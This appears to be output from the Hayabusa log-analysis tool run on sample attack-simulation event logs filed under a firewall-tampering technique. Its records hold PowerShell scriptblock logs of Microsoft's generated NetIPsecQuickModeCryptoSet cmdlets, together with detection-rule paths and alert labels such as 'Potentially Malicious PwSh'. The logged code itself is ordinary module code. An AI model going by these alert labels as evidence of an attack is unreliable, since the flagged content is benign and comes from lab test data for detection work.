[object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 
'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' 
$script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
